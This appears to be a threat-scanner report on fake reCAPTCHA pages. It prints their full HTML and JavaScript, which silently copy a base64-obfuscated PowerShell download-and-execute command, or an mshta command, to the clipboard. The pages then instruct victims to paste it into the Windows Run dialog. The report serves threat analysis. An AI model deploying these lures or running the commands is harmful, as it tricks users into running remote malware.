"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
http://101.32.40.22/
Total findings: 4
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "http://101.32.40.22/",
"URLs": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/"
],
"ClipboardCommands": "mshta ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..."
],
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { chec",
"} function hideCaptchaCheckbox() { chec",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let check",
"let checkboxBtn = document.getElementById(\"checkbox\"); let check",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let verif",
"let verifywindow = document.getElementById(\"verify-window\"); function",
"mber(); document.getElementById('verification-id').textContent = veri",
"lect(); document.execCommand(\"copy\"); docu",
"tempTextArea.select(); docume",
"</div> <script> let checkbo"
],
"HTML": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <title>reCAPTCHA Verification</title>\n\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \n <style>\n .container {\n font-family: Roboto, helvetica, arial, sans-serif;\n }\n\n .m-p {\n margin: 0;\n padding: 0;\n }\n\n .block {\n display: block;\n }\n\n code {\n font-size: 9px;\n margin-left: 2px;\n color: gray;\n }\n\n .line-normal {\n line-height: normal;\n }\n\n .checkbox-window {\n height: 74px;\n width: 300px;\n background-color: #f9f9f9;\n border-radius: 3px;\n border: 1px solid #d3d3d3;\n }\n\n .checkbox-window a {\n color: #555;\n text-decoration: none;\n }\n\n .checkbox-window a:hover {\n color: #555;\n text-decoration: underline;\n }\n\n .checkbox-container {\n width: 28px;\n height: 28px;\n }\n\n .checkbox {\n position: relative;\n background-color: #fff;\n border-radius: 2px;\n height: 100%;\n width: 100%;\n border: 2px solid #c1c1c1;\n margin: 21px 0 0 12px;\n outline: none;\n font-family: Roboto, helvetica, arial, sans-serif;\n transition: width 500ms, height 500ms, border-radius 500ms, margin-top 500ms, margin-left 500ms, opacity 700ms;\n }\n\n .checkbox:hover {\n border: 2px solid #b2b2b2;\n }\n\n .im-not-a-robot {\n position: relative;\n left: 52px;\n bottom: 3px;\n font-size: 15px;\n color: #282727;\n }\n\n .captcha-logo {\n position: relative;\n\n left: 244px;\n bottom: 36px;\n width: 40px;\n height: 45px;\n vertical-align: baseline;\n padding-bottom: 4px;\n }\n\n\n .checkbox-desc {\n color: #555555;\n position: relative;\n font-size: 8px;\n text-align: center;\n bottom: 40px;\n left: 112px;\n }\n\n .spinner {\n visibility: hidden;\n position: relative;\n top: -85px;\n left: 12px;\n height: 20px;\n width: 20px;\n border: 2px solid rgba(0, 0, 0, 0.1);\n border-top: 2px solid #333;\n border-radius: 50%;\n visibility: hidden;\n opacity: 0;\n transition: opacity 0.5s linear;\n animation: spin 1s linear infinite;\n }\n\n @keyframes spin {\n 0% {\n transform: rotate(0deg);\n }\n\n 100% {\n transform: rotate(360deg);\n }\n }\n\n .verify-window {\n font-family: Roboto, helvetica, arial, sans-serif;\n opacity: 0;\n position: absolute;\n visibility: hidden;\n margin: auto;\n width: 310px;\n background-color: #fff;\n border: 1px solid #cecece;\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n transition: opacity 400ms;\n }\n\n ol {\n counter-reset: item;\n list-style-type: none;\n list-style-position: outside; \n padding-left: 0;\n\n }\n\n ol li {\n counter-increment: item;\n margin-bottom: 10px;\n\n }\n\n ol li::before {\n content: counter(item) \". \";\n color: #1A73E8;\n font-weight: bold;\n margin-right: 10px;\n margin-left: 10px;\n }\n\n .verify-container {\n padding: 8px;\n }\n\n .verify-header {\n background-color: #1A73E8;\n padding: 16px 16px 24px 16px;\n color: #fff;\n }\n\n .verify-header-text-small {\n font-size: 14px;\n line-height: normal;\n }\n\n .verify-header-text-medium {\n font-size: 16px;\n }\n\n .verify-header-text-big {\n font-size: 24px;\n font-weight: 700;\n }\n\n .verify-main {\n padding: 5px;\n color: #111;\n font-size: 13px;\n\n }\n\n .verify-footer {\n border-top: 1px solid #cecece;\n padding: 10px 7px 10px 7px;\n color: #737373;\n display: grid;\n grid-template-columns: auto 102px;\n font-size: 13px;\n }\n\n .verify-footer-left {\n padding: 5px;\n }\n\n .verify-verify-button {\n text-transform: uppercase;\n background-color: #5a89e2;\n color: #fff;\n text-align: center;\n width: 100%;\n padding: 12px 0 12px 0;\n text-decoration: none;\n font-weight: 600;\n height: min-content;\n border-radius: 3px;\n font-size: 14px;\n border: none;\n outline: none;\n cursor: not-allowed;\n }\n </style>\n </head>\n <body>\n\n <div class=\"container m-p\"> \n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\n <div class=\"checkbox-container m-p\">\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\n </div>\n <p class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\n <br>\n <p class=\"checkbox-desc m-p line-normal\">\n <a href=\"https://www.google.com/intl/en/policies/privacy/\">Privacy</a> - <a href=\"https://www.google.com/intl/en/policies/terms/\">Terms</a>\n </p>\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\n </div>\n \n <div id=\"verify-window\" class=\"verify-window\">\n <div class=\"verify-container\">\n <header class=\"verify-header\">\n <span class=\"verify-header-text-medium m-p block\">\u5b8c\u6210\u8fd9\u4e9b</span>\n <span class=\"verify-header-text-big m-p block\">\u9a8c\u8bc1\u6b65\u9aa4</span>\n <span class=\"verify-header-text-medium m-p block\"></span>\n </header>\n <main class=\"verify-main\">\n <p>\n \u4e3a\u4e86\u66f4\u597d\u7684\u8bc1\u660e\u60a8\u4e0d\u662f\u673a\u5668\u4eba\uff0c\u8bf7:\n </p>\n <ol>\n <li>\n \u6309\u4f4fWindows\u952e <i class=\"fab fa-windows\"></i> + <b>R</b>\u3002\n </li>\n \n <li>\n \u5728\u9a8c\u8bc1\u7a97\u53e3\u4e2d\uff0c\u6309 <b>Ctrl</b> + <b>V</b>\u3002\n </li>\n\n <li>\n \u6309\u4e0b\u952e\u76d8\u4e0a\u7684 <b>Enter</b> \u952e\u5b8c\u6210\u3002\n </li>\n </ol>\n <p>\n \u60a8\u5c06\u9075\u5b88\u5e76\u540c\u610f:\n <br>\n <code>\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\n </code>\n </p>\n\n \n </main>\n </div>\n <footer class=\"verify-container verify-footer\">\n <div class=\"verify-footer-left\">\n \u6267\u884c\u4e0a\u8ff0\u6b65\u9aa4\u5373\u53ef\u5b8c\u6210\u9a8c\u8bc1\u3002\n </div>\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">\u9a8c\u8bc1</button>\n </footer>\n </div> \n </div>\n\n <script>\n let checkboxWindow = document.getElementById(\"checkbox-window\");\n let checkboxBtn = document.getElementById(\"checkbox\");\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\n let verifywindow = document.getElementById(\"verify-window\");\n\n function addCaptchaListeners() {\n if (checkboxBtn) {\n document.addEventListener(\"click\", function (event) {\n let path = event.composedPath();\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\n closeverifywindow();\n }\n });\n checkboxBtn.addEventListener(\"click\", function (event) {\n event.preventDefault();\n checkboxBtn.disabled = true;\n runClickedCheckboxEffects();\n });\n }\n }\n\n function runClickedCheckboxEffects() {\n hideCaptchaCheckbox();\n setTimeout(function(){\n showCaptchaLoading();\n },500);\n setTimeout(function(){\n showVerifyWindow();\n },900)\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.opacity = \"0\";\n checkboxBtnSpinner.style.animation = \"none\";\n setTimeout(function() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n }, 500);\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.visibility = \"hidden\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n\n function showCaptchaCheckbox() {\n checkboxBtn.style.width = \"100%\";\n checkboxBtn.style.height = \"100%\";\n checkboxBtn.style.borderRadius = \"2px\";\n checkboxBtn.style.margin = \"21px 0 0 12px\";\n checkboxBtn.style.opacity = \"1\";\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.width = \"4px\";\n checkboxBtn.style.height = \"4px\";\n checkboxBtn.style.borderRadius = \"50%\";\n checkboxBtn.style.marginLeft = \"25px\";\n checkboxBtn.style.marginTop = \"33px\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n checkboxBtnSpinner.style.opacity = \"0\";\n }\n\n function generateRandomNumber() {\n const min = 1000; \n const max = 9999;\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\n }\n\n function closeverifywindow() {\n verifywindow.style.display = \"none\";\n verifywindow.style.visibility = \"hidden\";\n verifywindow.style.opacity = \"0\";\n\n showCaptchaCheckbox();\n hideCaptchaLoading();\n checkboxBtn.disabled = false;\n }\n\n function isverifywindowVisible() {\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\n }\n\n function setClipboardCopyData(textToCopy){\n const tempTextArea = document.createElement(\"textarea\");\n tempTextArea.value = textToCopy;\n document.body.append(tempTextArea);\n tempTextArea.select();\n document.execCommand(\"copy\");\n document.body.removeChild(tempTextArea);\n }\n\n function stageClipboard(commandToRun, verification_id){\n const suffix = \" # \"\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\n const end = \"''\"\n const textToCopy = commandToRun + suffix + ploy + verification_id + end\n\n setClipboardCopyData(textToCopy);\n }\n\n\n function showVerifyWindow() {\n verifywindow.style.display = \"block\";\n verifywindow.style.visibility = \"visible\";\n verifywindow.style.opacity = \"1\";\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\n\n if (verifywindow.offsetTop < 5) {\n verifywindow.style.top = \"5px\";\n }\n\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth-10 ) {\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\n }\n\n var verification_id = generateRandomNumber();\n document.getElementById('verification-id').textContent = verification_id;\n \n const htaPath = window.location.origin + \"/recaptcha-verify\";\n const commandToRun = \"mshta \" + htaPath\n stageClipboard(commandToRun, verification_id)\n }\n\n addCaptchaListeners();\n\n </script>\n </body>\n</html>\n",
"ThreatLevel": "High"
}
https://staplebrokenmetaliyro.blogspot.com/
Total findings: 46
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://staplebrokenmetaliyro.blogspot.com/",
"URLs": [
"http://www.w3.org/1999/xhtml",
"http://www.google.com/2005/gml/b",
"http://www.google.com/2005/gml/data",
"http://www.google.com/2005/gml/expr",
"https://electricreport.org/ygd4g",
"https://staplebrokenmetaliyro.blogspot.com/favicon.ico",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt=rss",
"https://www.blogger.com/feeds/3967763303726818370/posts/default",
"https://www.blogger.com/profile/02686294779557843862",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://www.blogblog.com/indie/mspin_black_large.svg",
"https://www.blogblog.com/indie/mspin_white_large.svg",
"https://themes.googleusercontent.com/image?id=L1lcAxxz0CLgsDzixEprHJ2F38TyEjCyE3RSAjynQDks0lT1BDc1OxXKaTEdLc89HPvdB11X9FDw",
"http://www.offset.com/photos/394244",
"https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js",
"http://www.w3.org/1999/xlink",
"http://www.w3.org/1999/xlink",
"https://staplebrokenmetaliyro.blogspot.com/search",
"https://www.blogger.com",
"http://www.w3.org/1999/xlink",
"http://www.offset.com/photos/394244",
"http://www.w3.org/1999/xlink",
"https://www.blogger.com/profile/02686294779557843862",
"http://www.w3.org/1999/xlink",
"https://www.blogger.com/profile/02686294779557843862",
"https://www.blogger.com/profile/02686294779557843862",
"https://www.blogger.com/go/report-abuse",
"https://resources.blogblog.com/blogblog/data/res/2705757678-indie_compiled.js",
"https://www.blogger.com/static/v1/widgets/1991725782-widgets.js",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/search",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://staplebrokenmetaliyro.blogspot.com/favicon.ico",
"https://www.blogger.com",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default\\x22",
"https://staplebrokenmetaliyro.blogspot.com/feeds/posts/default?alt\\x3drss\\x22",
"https://www.blogger.com/feeds/3967763303726818370/posts/default\\x22",
"https://www.blogger.com/profile/02686294779557843862\\x22",
"https://apis.google.com/js/platform.js",
"https://staplebrokenmetaliyro.blogspot.com/",
"https://www.blogger.com/static/v1/jsbin/349593359-lbx.js",
"https://www.blogger.com/static/v1/v-css/3681588378-lightbox_bundle.css"
],
"SuspiciousKeywords": [
"<script>",
"\\x3d",
"\\x3c",
"\\x22",
"\\x3e",
"\\x27",
"display:none"
],
"ClipboardManipulation": "...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...",
"CaptchaElements": [
"ch1', 'search_top', document.getElementById('BlogSearch1'), {}, 'displayModeF",
"Header1', 'header', document.getElementById('Header1'), {}, 'displayModeF",
"log1', 'page_body', document.getElementById('Blog1'), {'cmtInteractions",
"sts1', 'page_body', document.getElementById('PopularPosts1'), {}, 'displayModeF",
"bution1', 'footer', document.getElementById('Attribution1'), {}, 'displayModeF",
"e1', 'sidebar_top', document.getElementById('Profile1'), {}, 'displayModeF",
", 'sidebar_bottom', document.getElementById('ReportAbuse1'), {}, 'displayModeF",
"5/gml/expr'> <head> <script> let linkNam",
"dio:not([controls]){display:none;height:0}[hidden],t",
"0}[hidden],template{display:none}a{background:transp",
"eak-word } .hidden{ display:none } .invisible{ visib",
"} input::-ms-clear{ display:none } .blogger-logo,.sv",
"mobile_video_class{ display:none } .bg-photo{ backgr",
".show-more.hidden{ display:none } .inline-ad{ displ",
":none } .inline-ad{ display:none; max-width:100%; ov",
"} } .item-control{ display:none } #comments{ border",
"read .thread-count{ display:none } #comments .commen",
"] p.comment-footer{ display:none } #comment-editor-s",
"comment-editor-src{ display:none } .comments .commen",
"ed-top-placeholder{ display:none } .collapsed-header",
"eader .replaced h1{ display:none } .centered-top-con",
"ader-image-wrapper{ display:none } .centered-top-con",
"ible>:not(summary){ display:none } .collapsible[open",
"kit-details-marker{ display:none } .collapsible-titl",
"itle .chevron-down{ display:none } .flat-button{ cur",
"ow-popup li.hidden{ display:none } .pill-button{ bac",
"x:101 } .search h3{ display:none } .search form{ dis",
"x } .search form>*{ display:none } .search.focused f",
"search-input label{ display:none } .centered-top-pla",
"search-expand-text{ display:none } .search-close{ di",
"ng .sharing-button{ display:none } .widget.Sharing .",
"ng-buttons li span{ display:none } .post-share-butto",
"are-buttons.hidden{ display:none } .sharing-button{",
"tainer .navigation{ display:none } } .dialog{ box-sh",
".FollowByEmail h3{ display:none } .subscribe-popup",
".bg-photo-overlay{ display:none } body#layout .page",
"layout .navigation{ display:none } body#layout .side",
"ody#layout .search{ display:none } .centered-top-con",
"ff; cursor:pointer; display:none; height:48px; margi",
".sticky .Header p{ display:none } .sticky .PageList",
".sticky .PageList{ display:none } .search-focused>*",
"t-holder .continue{ display:none } #comment-editor{",
".widget.Profile h2{ display:none } .widget.Profile h",
".sidebar_top:empty{ display:none } .sidebar-containe",
"p_wrapper.no-items{ display:none } } .post-snippet.s",
"l-ad-container ins{ display:none } .page_body.has-ve",
"} .hamburger-menu{ display:none } body.collapsed-he"
],
